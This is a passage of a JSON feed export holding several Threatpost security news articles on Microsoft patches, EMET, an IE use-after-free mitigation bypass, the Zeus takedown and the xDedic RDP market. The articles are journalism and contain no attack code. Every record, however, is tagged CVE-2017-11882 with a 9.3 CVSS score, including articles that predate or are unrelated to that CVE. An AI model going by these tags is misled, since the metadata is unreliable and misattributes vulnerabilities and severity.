{}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delay Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.\n\n> DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fbypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie%2F110570%2F&text=DeMott%26%238217%3Bs+bypass+works+through+the+use+of+what+he+calls+a+%26%238220%3Blong-lived+dangling+pointer.%26%238221%3B>)\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. \u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-live type and can basically upgrade it to an existing attack to bypasses these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. \u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch, otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s update had a distinct IE feel to them with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older version of the browser. With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Tool kit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. It was then when Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. Many advanced attacks exploit vulnerabilities in either platform, giving them an initial foothold on a system that can be then leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. \u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature where users are able to establish settings that block users from visiting websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a head\u2019s up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four critical bulletins others for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "[](<https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/>)Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&amp;C servers and filing suit against 39 unnamed defendants. The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and [Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&amp;C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&amp;C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing Analysis Center went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an associated in fact enterprise (herein after the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. \n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:45", "description": "In the midst of a relatively light [Patch Tuesday](<https://threatpost.com/critical-ie-update-one-of-eight-microsoft-security-bulletins/113231>), Microsoft yesterday introduced an [extra measure of security](<http://blogs.windows.com/msedgedev/2015/06/09/http-strict-transport-security-comes-to-internet-explorer-11-on-windows-8-1-and-windows-7/>) for users running Internet Explorer 11 on Windows 7 and Windows 8.1 machines: HSTS.\n\nShort for HTTP Strict Transport Security, HSTS is a browser header that forces any sessions sent over HTTP to be sent instead over HTTPS based on a [preloaded list of sites](<https://hstspreload.appspot.com/>) supporting the protocol. HSTS encrypts communication to and from a website, and puts a dent in attempts to man-in-the-middle web sessions. According to OWASP, HSTS also stops attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\n[HSTS is already on by default](<https://support.microsoft.com/de-de/kb/3058515/en-us>) in Internet Explorer 11 available in the Windows 10 Insider Preview and the new Microsoft Edge expected to be available when Windows 10 releases later this year.\n\n\u201cSite developers can use HSTS policies to secure connections by opting in to an HSTS preload list, which registers websites to be hardcoded by Microsoft Edge, Internet Explorer, and other browsers to redirect HTTP traffic to HTTPS,\u201d said Kyle Pflug, program manager with the Microsoft Edge team. \u201cCommunications with these websites from the initial connection are automatically upgraded to be secure.\u201d\n\nMicrosoft is the last of the major browser vendors to add HSTS support. Google Chrome and Mozilla Firefox have supported HSTS since 2011, while Apple added it to Safari upon the release of version 10.9 of Mavericks.\n\nThe move comes on the heels of Microsoft in May bringing Perfect Forward Secrecy to Windows. Forward secrecy has of late been considered an essential security measure, especially for new applications. It ensures that new private keys are negotiated for every web session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\nThe addition of HSTS was included in a [cumulative update for Internet Explorer](<https://technet.microsoft.com/en-us/library/security/ms15-056.aspx>) released yesterday. The security bulletin included patches for two dozen vulnerabilities in the browser, most of which gave hackers the ability to remotely execute code on a compromised computer.\n\nHSTS also resolves Mixed Content attacks where insecure HTTP script is loaded from a site secured via a HTTPS connection.\n\n\u201cWhen we initially announced HSTS in Windows 10, we noted that mixed content is not supported on servers supporting HSTS. With today\u2019s updates, this is still the case in Microsoft Edge on Windows 10 \u2013 mixed content is always blocked on these servers,\u201d Pflug said. \u201cFor Internet Explorer 11 on Windows 10, Windows 8.1, and Windows 7, the Information bar will prompt the user to proceed in mixed content scenarios.\u201d\n", "cvss3": {}, "published": "2015-06-10T11:47:26", "type": "threatpost", "title": "Microsoft Brings HSTS to Windows 7 and 8.1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-12T15:00:26", "id": "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "href": "https://threatpost.com/microsoft-brings-hsts-to-windows-7-and-8-1/113258/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). \u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or by let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, fires off a flag when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list top level domains, host names or files where IE will not block outdated controls. Admins can also disable the feature altogether. The feature will also be off by default in the Local Intranet Zone and Trusted Sites Zone allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. The update will be supported only on IE 8-11 on Windows 7 SP1, IE versions supported on Windows 8 and higher, and all Security Zones in the browser.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. \u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007, SP 3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security bypass features are also being patched in the .NET framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PC and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that use the Microsoft protocol Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of available servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. Typically, access to a PC or server can range between $7 to $15, according to Flashpoint.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/06225118/xDedic-Black-Market.jpg>)Once a hacker accesses a remote system they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these type of attacks,\u201d Kremez said. \u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these type attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest easiest target with the highest probability of a successful infiltration, Windows is it,\u201d he said.\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. Often times people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 